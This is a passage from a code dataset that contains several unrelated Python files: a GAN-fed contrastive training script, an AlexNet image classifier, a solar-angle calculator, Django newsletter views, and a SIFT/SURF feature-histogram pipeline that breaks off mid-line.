'{}_{}'.format(opt.model_name, os.path.basename(opt.data_folder))\n # warm-up for large-batch training,\n if opt.batch_size > 256:\n opt.warm = True\n if opt.warm:\n opt.model_name = '{}_warm'.format(opt.model_name)\n opt.warmup_from = 0.01\n opt.warm_epochs = 10\n if opt.cosine:\n eta_min = opt.learning_rate * (opt.lr_decay_rate ** 3)\n opt.warmup_to = eta_min + (opt.learning_rate - eta_min) * (\n 1 + math.cos(math.pi * opt.warm_epochs / opt.epochs)) / 2\n else:\n opt.warmup_to = opt.learning_rate\n \n opt.tb_folder = os.path.join(opt.tb_path, opt.model_name)\n if not os.path.isdir(opt.tb_folder):\n os.makedirs(opt.tb_folder)\n\n opt.save_folder = os.path.join(opt.model_path, opt.model_name)\n if not os.path.isdir(opt.save_folder):\n os.makedirs(opt.save_folder)\n\n if opt.dataset == 'biggan' or opt.dataset == 'imagenet100' or opt.dataset == 'imagenet100K' or opt.dataset == 'imagenet':\n if opt.method == 'SimCLR':\n opt.img_size = 128\n else:\n opt.img_size = 128\n elif opt.dataset == 'cifar10' or opt.dataset == 'cifar100':\n opt.img_size = 32\n\n return opt\n\n\ndef worker_func(x):\n print(\"Wrker\", x)\n torch.cuda.set_device(x+1)\ndef set_loader(opt):\n # construct data loader\n if opt.dataset == 'cifar10':\n mean = (0.4914, 0.4822, 0.4465)\n std = (0.2023, 0.1994, 0.2010)\n elif opt.dataset == 'cifar100':\n mean = (0.5071, 0.4867, 0.4408)\n std = (0.2675, 0.2565, 0.2761)\n elif opt.dataset == 'biggan' or opt.dataset == 'imagenet100' or opt.dataset == 'imagenet100K' or opt.dataset == 'imagenet':\n mean = (0.485, 0.456, 0.406)\n std = (0.229, 0.224, 0.225)\n else:\n raise ValueError('dataset not supported: {}'.format(opt.dataset))\n normalize = transforms.Normalize(mean=mean, std=std)\n opt.mean = mean\n opt.std = std\n\n train_transform = transforms.Compose([\n transforms.RandomResizedCrop(size=int(opt.img_size*0.875), scale=(0.2, 1.)),\n transforms.RandomHorizontalFlip(),\n transforms.RandomApply([\n transforms.ColorJitter(0.4, 0.4, 0.4, 0.1)\n ], p=0.8),\n transforms.RandomGrayscale(p=0.2),\n transforms.ToTensor(),\n normalize,\n ])\n# gan_model_name='biggan-deep-256'\n gan_model_name = 'https://tfhub.dev/deepmind/bigbigan-resnet50/1' # ResNet-50\n dataset = OnlineGanDataset(train_transform, gan_model_name, opt=opt)\n dataset.offset_start = 85 * opt.niter \n all_epochs_sampler = BatchSampler(SequentialSampler(dataset), batch_size=opt.batch_size_gen, drop_last=False)\n data_loader = DataLoader(dataset, batch_size=None, sampler=all_epochs_sampler, \n num_workers=opt.num_workers, worker_init_fn=worker_func, multiprocessing_context='spawn')\n\n return data_loader\n\ndef trans_func(single_image, transform):\n pil_image = functional.to_pil_image(single_image[0])\n return transform(pil_image)\n\nclass OnlineGanDataset(Dataset):\n def __init__(self, transform, gan_model_name, opt):\n\n self.transform = transform\n self.gan_model_name = gan_model_name\n self.offset_start = 0\n self.opt = opt\n self.gan_model = None\n self.func = functools.partial(trans_func, transform=transform)\n# with open('./utils/imagenet100_class_index.json', 'rb') as fid: \n with open('./utils/imagenet_class_index.json', 'rb') as fid: \n imagenet_class_index_dict = json.load(fid)\n self.idx_imagenet100 = list(map(int, list(imagenet_class_index_dict.keys())))\n\n\n def get_available_gpus(self):\n local_device_protos = device_lib.list_local_devices()\n return [x.name for x in local_device_protos if x.device_type == 'GPU']\n\n# def lazy_init_gan(self):\n# if self.gan_model is None:\n# print(\"initializing GAN\", torch.cuda.device_count(), torch.cuda.current_device())\n# module = hub.Module(self.gan_model_name) # inference\n# self.gpu_idx_current = torch.cuda.current_device()\n# self.gan_model = ubigbi.BigBiGAN(module)\n# self.gen_ph = self.gan_model.make_generator_ph()\n# # Compute samples G(z) from encoder input z (`gen_ph`).\n# self.gen_samples = self.gan_model.generate(self.gen_ph)\n# ## Create a TensorFlow session and initialize variables\n# init = tf.global_variables_initializer()\n# self.sess = tf.Session()\n# self.sess.run(init)\n# print('lazy_init: get_available_gpus()', self.get_available_gpus())\n\n def lazy_init_gan(self):\n start_time = time.time()\n if self.gan_model is None:\n print(\"initializing GAN on {} GPUs, currently on GPU:{}\".format(torch.cuda.device_count(),\n torch.cuda.current_device()))\n self.gpu_idx_current = torch.cuda.current_device()\n\n with tf.device('/gpu:{}'.format(self.gpu_idx_current)):\n module = hub.Module(self.gan_model_name) # inference\n self.gan_model = ubigbi.BigBiGAN(module)\n self.gen_ph = self.gan_model.make_generator_ph()\n self.gen_samples = self.gan_model.generate(self.gen_ph)\n \n# self.sess = tf.Session(config=tf.ConfigProto(log_device_placement=True, allow_soft_placement=True))\n self.sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True))\n\n init = tf.global_variables_initializer()\n self.sess.run(init)\n print('spent time to init device GPU:{} is {}'.format(torch.cuda.current_device(), time.time() - start_time))\n# print('lazy_init: get_available_gpus()', self.get_available_gpus())\n\n def apply_im_transform(self, anchor_out):\n anchor_out = 255 * ((anchor_out + 1.0)/2.0)\n anchor_out = anchor_out.detach().cpu().numpy()\n anchor_out = anchor_out.astype(np.uint8)\n anchor_out = np.transpose(anchor_out, [0, 2, 3, 1])\n anchor_out = np.split(anchor_out, anchor_out.shape[0])\n images_anchor = map(self.func, anchor_out)\n images_anchor = np.concatenate([x[None,:] for x in images_anchor])\n images_anchor = torch.from_numpy(images_anchor)\n return images_anchor\n \n def __len__(self):\n # Since we are skipping samples on every iteration\n # On every iteration we skip batch % batch_gen\n # niter / batch * batch mod batch_gen\n batch_size = self.opt.batch_size\n skipped = (self.opt.niter // batch_size) * (self.opt.batch_size_gen % batch_size)\n return (self.opt.niter + skipped) * self.opt.epochs\n \n def __getitem__(self, indices):\n start_time = time.time()\n self.lazy_init_gan()\n truncation = 1.0\n std_scale = 0.2\n batch_size = len(indices)\n \n start_seed = 0\n idx = indices[0] + self.offset_start\n# seed = start_seed + 2 * idx\n seed = None\n state = None if seed is None else np.random.RandomState(seed)\n zs = truncation * truncnorm.rvs(-2, 2, size=(batch_size, 120), random_state=state).astype(np.float32)\n feed_dict = {self.gen_ph: zs}\n# print('__getitem__: get_available_gpus()', self.get_available_gpus())\n\n# with tf.device('/device:GPU:{}'.format(self.gpu_idx_current)):\n anchor_out = self.sess.run(self.gen_samples, feed_dict=feed_dict)\n \n anchor_out = np.transpose(anchor_out, (0, 3, 1, 2))\n anchor_out = torch.from_numpy(anchor_out).cuda()\n \n# anchor_out = anchor_out[:,:,0:112, 0:112]\n# ims = torch.tensor(anchor_out, dtype=torch.float32, device='cuda') #<== might need to manage between TF and those used for encoder\n# images.append(ims)\n\n \n# zs = torch.from_numpy(zs)\n zsold = zs\n idx_cls = np.random.choice(self.idx_imagenet100, batch_size)\n# class_vector = one_hot_from_int(idx_cls, batch_size=batch_size)\n# class_vector = torch.from_numpy(class_vector)\n# zs = zs.cuda()\n# class_vector = class_vector.cuda()\n #model_biggan.to(f'cuda:{model_biggan.device_ids[0]}')\n# with torch.no_grad():\n# anchor_out = self.gan_model(zs, class_vector, truncation)\n\n# seed = start_seed + 2 * idx + 1\n seed = None\n state = None if seed is None else np.random.RandomState(seed)\n ws = truncation * truncnorm.rvs(-2, 2, size=(batch_size, 120), scale=std_scale, random_state=state).astype(np.float32)\n zs = zs + ws\n feed_dict = {self.gen_ph: zs}\n# with tf.device('/device:GPU:{}'.format(self.gpu_idx_current)):\n anchor_out2 = self.sess.run(self.gen_samples, feed_dict=feed_dict)\n \n anchor_out2 = np.transpose(anchor_out2, (0, 3, 1, 2))\n anchor_out2 = torch.from_numpy(anchor_out2).cuda()\n \n images_anchor = self.apply_im_transform(anchor_out)\n images_anchor2 = self.apply_im_transform(anchor_out2)\n# print('loader spent time', time.time() - start_time)\n return images_anchor, images_anchor2, idx_cls\n\ndef set_model(opt):\n if opt.encoding_type == 'contrastive':\n model = SupConResNet(name=opt.model, img_size=int(opt.img_size*0.875))\n criterion = SupConLoss(temperature=opt.temp)\n\n elif opt.encoding_type == 'crossentropy':\n model = SupCEResNet(name=opt.model, num_classes=opt.n_cls, img_size=int(opt.img_size*0.875))\n criterion = torch.nn.CrossEntropyLoss()\n\n elif opt.encoding_type == 'autoencoding':\n print(\"TODO(ali): Implement here\")\n raise NotImplementedError\n\n # enable synchronized Batch Normalization\n if opt.syncBN:\n model = apex.parallel.convert_syncbn_model(model)\n\n if torch.cuda.is_available():\n if torch.cuda.device_count() > 1:\n model.encoder = torch.nn.DataParallel(model.encoder, device_ids=[0])\n model = model.cuda()\n criterion = criterion.cuda()\n cudnn.benchmark = True\n\n return model, criterion\n\n\ndef train(data_loader_iterator, model, criterion, optimizer, epoch, opt, start_seed):\n \"\"\"one epoch training\"\"\"\n model.train()\n \n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n\n top1 = AverageMeter()\n end = time.time()\n\n print(\"Start train\")\n count = opt.niter // opt.batch_size\n ratio_gen_to_consumer = math.ceil(opt.batch_size / opt.batch_size_gen)\n iter_num = 0\n while iter_num < count:\n idx = iter_num\n iter_num += 1\n data_batch = []\n for it in range(ratio_gen_to_consumer):\n data = next(data_loader_iterator)\n data_batch.append(data)\n\n\n data = [torch.cat(tensor_val) for tensor_val in zip(*data_batch)]\n# print(data[0].shape)\n data = [tensor_val[:opt.batch_size] for tensor_val in data]\n if len(data) == 2:\n images = data[0]\n labels = data[1]\n elif len(data) == 3:\n images = data[:2]\n labels = data[2]\n else:\n raise NotImplementedError\n data_time.update(time.time() - end)\n if opt.encoding_type != 'contrastive':\n # We only pick one of images\n images = images[1]\n else:\n ims = images[0]\n anchors = images[1]\n images = torch.cat([images[0].unsqueeze(1), images[1].unsqueeze(1)],\n dim=1)\n # print('2) images shape', images.shape)\n\n images = images.view(-1, 3, int(opt.img_size*0.875), int(opt.img_size*0.875)).cuda(non_blocking=True)\n # print('3) images shape', images.shape)\n\n # labels = labels.cuda(non_blocking=True) <== do we need non_blocking for idx_cls?\n bsz = labels.shape[0]\n # warm-up learning rate\n warmup_learning_rate(opt, epoch, idx, opt.niter, optimizer)\n # compute loss\n\n\n if opt.encoding_type == 'contrastive':\n features = model(images)\n features = features.view(bsz, 2, -1)\n if opt.method == 'SupCon':\n loss = criterion(features, labels)\n elif opt.method == 'SimCLR':\n loss = criterion(features)\n else:\n raise ValueError('contrastive method not supported: {}'.\n format(opt.method))\n elif opt.encoding_type == 'crossentropy':\n output = model(images)\n loss = criterion(output, labels)\n acc1, acc5 = accuracy(output, labels, topk=(1, 5))\n top1.update(acc1[0], bsz)\n else:\n raise NotImplementedError\n\n\n # update metric\n losses.update(loss.item(), bsz)\n\n # SGD\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n print('time spent per batch:', batch_time.avg)\n # print info\n if (idx + 1) % opt.print_freq == 0:\n if opt.encoding_type == 'crossentropy':\n print('Train: [{0}][{1}/{2}]\\t'\n 'BT {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'DT {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'loss {loss.val:.3f} ({loss.avg:.3f})\\t'\n 'Acc@1 {top1.val:.3f} ({top1.avg:.3f})'.format(\n epoch, idx + 1, count, batch_time=batch_time,\n data_time=data_time, loss=losses, top1=top1))\n else:\n print('Train: [{0}][{1}/{2}]\\t'\n 'BT {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'DT {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'loss {loss.val:.3f} ({loss.avg:.3f})'.format(\n epoch, idx + 1, count, batch_time=batch_time,\n data_time=data_time, loss=losses))\n sys.stdout.flush()\n other_metrics = {}\n\n if opt.encoding_type == 'crossentropy':\n other_metrics['top1_acc'] = top1.avg\n\n if opt.showimg:\n other_metrics['image'] = [ims[:8], anchors[:8]]\n\n return losses.avg, other_metrics\n\n\ndef trans_func(single_image, transform):\n pil_image = functional.to_pil_image(single_image[0])\n return transform(pil_image)\n\ndef main():\n opt = parse_option()\n \n print('train config:', opt)\n\n with open(os.path.join(opt.save_folder, 'train_config.yml'), 'w') as f:\n yaml.dump(vars(opt), f, default_flow_style=False)\n \n # One GPU is used for consuming, the rest for generating\n num_gpus = torch.cuda.device_count() - 1\n if opt.batch_size_gen == -1:\n opt.batch_size_gen = math.ceil(opt.batch_size / (num_gpus))\n\n # build data loader\n # opt.encoding_type tells us how to get training data\n opt.niter = 1300000\n opt.num_workers = min(opt.num_workers, torch.cuda.device_count() - 1)\n# opt.num_workers = 1\n train_loader = set_loader(opt)\n\n # build model and criterion\n # opt.encoding_type tells us what to put as the head; choices are:\n # contrastive -> mlp or linear\n # crossentropy -> one linear for pred_y\n # autoencoding -> one linear for pred_z and one linear for pred_y\n model, criterion = set_model(opt)\n\n # build optimizer\n optimizer = set_optimizer(opt, model)\n\n # tensorboard\n logger = tb_logger.Logger(logdir=opt.tb_folder, flush_secs=2)\n\n # Start the data loader\n\n # training routine\n train_loader_iterator = iter(train_loader)\n init_epoch = 1\n\n if len(opt.resume) > 0:\n model_ckp = torch.load(opt.resume)\n init_epoch = model_ckp['epoch'] + 1\n model.load_state_dict(model_ckp['model'])\n optimizer.load_state_dict(model_ckp['optimizer'])\n\n for epoch in range(init_epoch, opt.epochs + 1):\n adjust_learning_rate(opt, optimizer, epoch)\n\n # train for one epoch\n time1 = time.time()\n loss, other_metrics = train(train_loader_iterator, model, criterion, optimizer, epoch, opt, start_seed=0)\n time2 = time.time()\n print('epoch {}, total time {:.2f}'.format(epoch, time2 - time1))\n\n # tensorboard logger\n logger.log_value('loss', loss, epoch)\n logger.log_value('learning_rate', optimizer.param_groups[0]['lr'], epoch)\n for metric_name, metric_value in other_metrics.items():\n if metric_name == 'image':\n images = metric_value\n anchors = images[0]\n otherims = images[1]\n bs = anchors.shape[0]\n grid_images = vutils.make_grid(\n torch.cat((anchors, otherims)), nrow=bs)\n grid_images *= np.array(opt.std)[:, None, None]\n grid_images += np.array(opt.mean)[:, None, None]\n grid_images = (255*grid_images.cpu().numpy()).astype(np.uint8)\n grid_images = grid_images[None, :].transpose(0,2,3,1)\n logger.log_images(metric_name, grid_images, epoch)\n else:\n logger.log_value(metric_name, metric_value, epoch)\n\n if epoch % opt.save_freq == 0:\n save_file = os.path.join(\n opt.save_folder, 'ckpt_epoch_{epoch}.pth'.format(epoch=epoch))\n save_model(model, optimizer, opt, epoch, save_file)\n\n # save the last model\n save_file = os.path.join(\n opt.save_folder, 'last.pth')\n save_model(model, optimizer, opt, opt.epochs, save_file)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"online_learning/main_unified_online_mp_v2.py","file_name":"main_unified_online_mp_v2.py","file_ext":"py","file_size_in_byte":23509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"358049565","text":"import os\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n\r\nbasedir = './dataset/'\r\ntrain_dir = os.path.join(basedir, 'train/')\r\nval_dir = os.path.join(basedir, 'validation/')\r\ntrain_cats_dir = os.path.join(train_dir, 'cats/')\r\ntrain_dogs_dir = os.path.join(train_dir, 'dogs/')\r\nval_cats_dir = os.path.join(val_dir, 'cats/')\r\nval_dogs_dir = os.path.join(val_dir, 'dogs/')\r\ntotal_train = len(os.listdir(train_dir))\r\ntotal_val = len(os.listdir(val_dir))\r\n\r\n\r\n\r\n\r\n# 该函数将图像绘制成1行5列的网格形式,图像放置在每一列中。\r\ndef plotImages(images_arr):\r\n fig, axes = plt.subplots(1, 5, figsize=(20, 20))\r\n axes = axes.flatten()\r\n for img, ax in zip(images_arr, axes):\r\n ax.imshow(img)\r\n ax.axis('off')\r\n plt.tight_layout()\r\n plt.show()\r\n\r\n\r\ntrain_image_generate = tf.keras.preprocessing.image.ImageDataGenerator(\r\n rescale=1./255,\r\n rotation_range=45,\r\n width_shift_range=.15,\r\n height_shift_range=.15,\r\n horizontal_flip=True,\r\n zoom_range=0.5\r\n)\r\nbatch_size = 128\r\nIMG_HEIGHT = 224\r\nIMG_WIDTH = 224\r\nepochs = 10\r\n\r\ntrain_data_generate = train_image_generate.flow_from_directory(\r\n batch_size=batch_size,\r\n directory=train_dir,\r\n shuffle=True,\r\n target_size=(IMG_HEIGHT, IMG_WIDTH),\r\n class_mode='binary'\r\n)\r\n\r\n\r\n\r\nval_image_generate = tf.keras.preprocessing.image.ImageDataGenerator(rescale=1. / 255)\r\n\r\n\r\nval_data_generate = val_image_generate.flow_from_directory(batch_size=batch_size,\r\n directory=val_dir,\r\n target_size=(IMG_HEIGHT, IMG_WIDTH),\r\n class_mode='binary')\r\n\r\n\r\n\r\n\r\n\r\nmodel = tf.keras.models.Sequential([\r\n# 第一个卷积层\r\n tf.keras.layers.Conv2D(filters=96, kernel_size=(11, 11), strides=(4, 4), padding='valid', activation='relu',\r\n input_shape=(IMG_WIDTH, IMG_HEIGHT, 3)),\r\n # 第一个参数为卷积核个数,第二个参数为卷积核尺寸,为(width, height),如果两者相同,用一个数字即可\r\n tf.keras.layers.BatchNormalization(),\r\n\r\n tf.keras.layers.MaxPooling2D(pool_size=(3, 3),\r\n strides=(2, 2),\r\n padding='valid'),\r\n\r\n #第二个卷积层\r\n tf.keras.layers.Conv2D(filters=256, kernel_size=(5, 5), strides=(1, 1), padding='same', activation='relu'),\r\n tf.keras.layers.BatchNormalization(),\r\n tf.keras.layers.MaxPool2D(pool_size=(3, 3),\r\n strides=(2, 2),\r\n padding='valid'),\r\n\r\n # 第三-五卷积层\r\n tf.keras.layers.Conv2D(filters=384, kernel_size=(3, 3), strides=(1, 1), padding='same', activation='relu'),\r\n tf.keras.layers.Conv2D(filters=384, kernel_size=(3, 3), strides=(1, 1), padding='same', activation='relu'),\r\n tf.keras.layers.Conv2D(filters=256, kernel_size=(3, 3), strides=(1, 1), padding='same', activation='relu'),\r\n tf.keras.layers.MaxPool2D(pool_size=(3, 3),\r\n strides=(2, 2),\r\n padding='valid'),\r\n\r\n # 第六-八连接层\r\n\r\n tf.keras.layers.Flatten(),\r\n tf.keras.layers.Dense(4096, activation='relu'),\r\n tf.keras.layers.Dropout(0.5),\r\n tf.keras.layers.Dense(4096, activation='relu'),\r\n tf.keras.layers.Dropout(0.5),\r\n tf.keras.layers.Dense(1000, activation='relu'),\r\n tf.keras.layers.Dropout(0.5),\r\n\r\n # 输出\r\n tf.keras.layers.Dense(2),\r\n tf.keras.layers.Activation('softmax')\r\n])\r\n\r\n\r\n\r\nmodel.compile(optimizer='sgd',\r\n loss='categorical_crossentropy',\r\n metrics=['accuracy'])\r\n\r\n# categorical_crossentropy与softmax匹配使用\r\n#sigmoid 与二进制交叉熵损失函数BinaryCrossentropy(from_logits=True)\r\n# 因为模型最后一层的sotfmax已经概率化输出了,所以from_logits=False,如果输出最后结果没有\r\n#进行激活函数sigmoid的映射之类的就设置成True\r\nmodel.summary()\r\n\r\n\r\nhistory = model.fit_generator(\r\n train_data_generate,\r\n steps_per_epoch=total_train // batch_size,\r\n epochs=epochs,\r\n validation_data=val_data_generate,\r\n validation_steps=total_val // batch_size\r\n)\r\n\r\n\r\n# 可视化模型\r\nacc = history.history['accuracy']\r\nval_acc = history.history['val_accuracy']\r\n\r\nloss = history.history['loss']\r\nval_loss = history.history['val_loss']\r\n\r\nepochs_range = range(epochs)\r\n\r\nplt.figure(figsize=(8, 8))\r\nplt.subplot(1, 2, 1)\r\nplt.plot(epochs_range, acc, label='Training Accuracy')\r\nplt.plot(epochs_range, val_acc, label='Validation Accuracy')\r\nplt.legend(loc='lower right')\r\nplt.title('Training and Validation Accuracy')\r\n\r\nplt.subplot(1, 2, 2)\r\nplt.plot(epochs_range, loss, label='Training Loss')\r\nplt.plot(epochs_range, val_loss, label='Validation Loss')\r\nplt.legend(loc='upper right')\r\nplt.title('Training and Validation Loss')\r\n\r\n\r\nplt.show()","sub_path":"AlexNet.py","file_name":"AlexNet.py","file_ext":"py","file_size_in_byte":4947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"319282209","text":"# 阳光角度\nimport math\nimport time\nimport datetime\n\n\ndef solarAngles(longitude,latitude):\n longi = longitude\n lati = latitude\n localtime = time.localtime(time.time())\n dec = 23.45*math.sin(math.radians(360*(284+localtime.tm_yday)/365))\n if(longi>0):\n a = 1\n else:\n a = -1\n timezone = int((longi+7.5*(a))/15)\n UTCh = datetime.datetime.utcnow().hour\n ST = timezone + UTCh\n h=15*(ST-12)\n solaraltitudesin = math.cos(math.radians(h))*math.cos(math.radians(dec))*math.cos(math.radians(lati))+math.sin(math.radians(dec))*math.sin(math.radians(lati))\n solaraltitude = math.degrees(math.asin(solaraltitudesin))\n solarazimuthcos = (math.sin(math.radians(dec))-math.sin(math.radians(solaraltitude))*math.sin(math.radians(lati)))/(math.cos(math.radians(solaraltitude))*math.cos(math.radians(lati)))\n solarazimuth = math.degrees(math.acos(solarazimuthcos))\n # print(h)\n if(h>=0):\n solarazimuth = - solarazimuth\n return round(solaraltitude,2),round(solarazimuth,2)\n\n\nif __name__ == '__main__':\n longitude = 121.47\n latitude = 31.23\n y = solarAngles(longitude,latitude)\n print(y)","sub_path":"solarAngles.py","file_name":"solarAngles.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"386351849","text":"from post.models import *\nfrom newsletter.models import *\nfrom django.http import HttpResponse\nfrom django.core.mail import send_mail\nfrom django.template.loader import render_to_string\nfrom django.shortcuts import render, get_object_or_404\n\"\"\"\n Sending NewsLetter \n\"\"\"\ndef SendLetter(request):\n emails = list(Newsletter.objects.values_list(\"email\", flat=True).all())\n latest = Posts.objects.order_by(\"-pk\")[0:3]\n html = render_to_string(\n \"Newsletter/newsletter.htm\", context={\n \"posts\":latest\n }\n )\n send_mail(\n \"Daliy Newsletter From Scott Wilson Blogging Site\",\n message=\"newsletter\",\n recipient_list=emails,\n from_email=\"ScottWilson@gmail.com \",\n html_message=html,\n )\n return render(request,\"Newsletter/newsletter.htm\", context={\n \"posts\":latest\n })\n \n\"\"\"\n Oping into Newsletter\n\"\"\"\ndef JoinLetter(request):\n if request.method == \"POST\":\n email = request.POST.get('email')\n if request.user.is_authenticated:\n if Newsletter.objects.filter(email=request.user.email).exists():\n return HttpResponse(\"Email Already Exists In Our Newsletter\")\n else:\n news = Newsletter(email=request.user.email)\n news.save()\n return HttpResponse(\"You Have Successfully Subcribe To Our Newsletter\")\n else: \n if email == \"\":\n return HttpResponse(\"Email Field Can't Be Left Null\")\n else:\n if Newsletter.objects.filter(email=email).exists():\n return HttpResponse(\"Email Already Exists In Our Newsletter\")\n else:\n news = Newsletter(email=email)\n news.save()\n return HttpResponse(\"You Have Successfully Subcribe To Our Newsletter\")\n\"\"\"\n Oping out of Newsletter\n\"\"\"\ndef LeaveLetter(request):\n if request.user.is_authenticated:\n if Newsletter.objects.filter(email=request.user.email).exists():\n news = get_object_or_404(Newsletter, email=request.user.email)\n news.delete()\n return HttpResponse(\"You Have UnSubcribed From Our Newsletter\")\n else: \n if request.method == \"POST\":\n pks = request.POST.get(\"email\")\n if Newsletter.objects.filter(email=pks).exists():\n news = get_object_or_404(Newsletter, pk=pk)\n news.delete()\n return HttpResponse(\"You Have UnSubcribed From Our Newsletter\")\n ","sub_path":"blog/newsletter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"119010896","text":"import cv2\nimport numpy as np\nfrom sklearn.cluster import KMeans\nimport matplotlib.pyplot as plt\nimport pickle\nfrom numpy.testing import assert_allclose\nimport glob\nfrom scipy.spatial.distance import cdist\nimport json\nfrom load_data import *\nfrom highlight import *\nfrom useful_functions import save, load\n\n\"\"\"############################################################################\n## Functions for generating SIFT features\n## --------------------------------------\n:: 1. Dense SIFT\n:: 2. SIFT\n:: 3. SURF\n############################################################################\"\"\"\n\n# Dense SIFT\ndef get_dsift(img, step=4):\n\n # Make a copy\n if type(img) == str:\n im = cv2.imread(img)\n else:\n im = img\n\n # Create SIFT extractor\n sift = cv2.xfeatures2d.SIFT_create()\n\n # Get gray image\n gray_img = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\n\n # Extract keypoints\n keypoints = [cv2.KeyPoint(x, y, step)\n for y in range(0, gray_img.shape[0], step)\n for x in range(0, gray_img.shape[1], step)]\n\n # Extract SIFT features\n keypoints, descriptors = sift.detectAndCompute(gray_img, None)\n\n # Return keypoints and descriptors\n return keypoints, descriptors\n\n# SIFT\ndef get_sift(img):\n\n # Make a copy\n if type(img) == str:\n im = cv2.imread(img)\n else:\n im = img\n\n # Create SIFT extractor\n sift = cv2.xfeatures2d.SIFT_create()\n\n # Get gray image\n gray_img = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\n\n # Extract SIFT features\n keypoints, descriptors = sift.detectAndCompute(gray_img, None)\n\n # Return keypoints and descriptors\n return keypoints, descriptors\n\n# SURF\ndef get_surf(img, Hessian_threshold=400):\n # Make a copy\n if type(img) == str:\n im = cv2.imread(img)\n else:\n im = img\n surf = cv2.xfeatures2d.SURF_create(Hessian_threshold)\n # surf.extended = True\n keypoints, descriptors = surf.detectAndCompute(im, None)\n return keypoints, descriptors\n\n\"\"\"############################################################################\n## Extract descriptors for all images\n## ----------------------------------\n:: Extract DSIFT if 'method' = 'True'\n:: Otherwise extract SIFT\n############################################################################\"\"\"\n\ndef get_all_descriptors(images, method='sift'):\n\n # List of descriptors\n descriptors = []\n\n # List of images that have no descriptors\n has_no_desc = list()\n\n # Extract descriptors for all images\n i = 0\n for im in images:\n print(i+1, '/', len(images))\n\n # SIFT or DSIFT\n if method == 'dsift':\n kp, desc = get_dsift(im)\n elif method == 'sift':\n kp, desc = get_sift(im)\n elif method == 'surf':\n kp, desc = get_surf(im)\n\n # Check if kp is empty\n if not kp:\n has_no_desc.append(i)\n continue\n\n # Add to list of descriptors\n descriptors.append(desc)\n\n i += 1\n\n # Return list of all descriptors\n return descriptors, has_no_desc\n\n\"\"\"############################################################################\n## Get subset of all descriptors\n## -----------------------------\n############################################################################\"\"\"\n\n# Get fraction of descriptors\ndef get_subset_of_all_descriptors(descriptors, fraction, num_of_classes):\n\n # Number of iteration\n iter = fraction * (1./float(num_of_classes)) * len(descriptors)\n\n # List of subset of descriptors\n sub_descriptors = []\n\n # Get subset of all descriptors\n desc_index = 0\n for img in range(num_of_classes):\n for i in range(int(iter)):\n sub_descriptors.append(descriptors[desc_index])\n desc_index += 1\n\n # Return subset of descriptors\n return sub_descriptors\n\n\"\"\"############################################################################\n## K-means\n## -------\n:: OpenCV's kmeans function\n#############################################################################\"\"\"\n\n# K-means openCV\ndef k_means(features, k):\n\n # Convert to float32\n features = np.float32(features)\n\n # OpenCV criteria\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)\n\n # Run kmeans\n _, label, center = cv2.kmeans(features, k, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)\n\n # Return labels, centers\n return label, center\n\n\"\"\"############################################################################\n## Create histograms\n## -----------------\n:: 1. Create a histogram matrix of zeros of size (n_descriptors × k)\n:: 2. For each descriptor:\n:: 3. Calculate minimum distaces to cluster centers\n:: 4. Assign labels to each row of the descriptor\n:: 5. Increase the value by 1 in the corresponding bin of the current histogram\n:: 6. Normalize histogram\n:: 7. Return histogram matrix\n############################################################################\"\"\"\n\ndef create_histograms(descriptors, cluster_centers):\n\n # Create empty matrix for histograms\n histograms = np.zeros((len(descriptors), len(cluster_centers)))\n\n # Create histograms\n pic = 0\n for des in descriptors:\n\n # Calculate distances from cluster centers\n distances = cdist(des, cluster_centers)\n\n # Generate histograms for all images\n for i in range(len(des)):\n\n # Get label of closest cluster center\n label = np.argmin(distances[i])\n\n # Add to histogram\n histograms[pic][label] += 1\n\n # Normalize histogram\n histograms[pic] = histograms[pic] / np.max(histograms[pic])\n pic+=1\n\n # Return histograms\n return histograms\n\n\"\"\"############################################################################\n## Build database\n############################################################################\"\"\"\n\ndef build_database(images, k=10, fraction=1., n_classes=5, method='sift'):\n\n # Extract descriptors\n print('[INFO] Extracting features...')\n descriptors, to_omit = get_all_descriptors(images, method)\n\n # Get subset of descriptors\n # print('Creating subset...')\n # subset_of_descriptors = get_subset_of_all_descriptors(descriptors, fraction, n_classes)\n\n # Stack subset of descriptors\n # print('Stacking subset of descriptors...')\n # return subset_of_descriptors\n all_descriptors = np.vstack((descriptors))\n\n # Run K-means\n print('[INFO] Running k-mean... (k =', str(k) + ')')\n label, center = k_means(all_descriptors, k)\n\n # Create histograms\n print('[INFO] Creating histograms...')\n histograms = create_histograms(descriptors, center)\n\n return histograms, to_omit\n\n\"\"\"############################################################################\n## Ex.\n############################################################################\"\"\"\n\nif __name__ == '__main__':\n\n # _, _, images, targets = load_data_2(json_path='Jos_jsons/', images_path='Jos_images/')\n path = 'Jos_images/'\n to_dir = 'Jos_histograms/orig_2/'\n images, targets = load_data_3(path=path)\n # BLACKS = glob.glob(path + 'black/*.png')\n # WHITES = glob.glob(path + 'white/*.png')\n # images = images[:10]\n print('[INFO] Num of images:', len(images))\n K = [5, 10, 20, 50, 100, 200]\n # methods = ['sift', 'dsift', 'surf']\n methods = ['surf']\n save_histograms = 1\n if save_histograms:\n for method in methods:\n for k in K:\n print(method, 'k =', k)\n\n # ORIGINAL\n # print('orig...')\n historgrams_orig, leave_out_orig = build_database(images, k=k, method=method)\n save(historgrams_orig, dir + 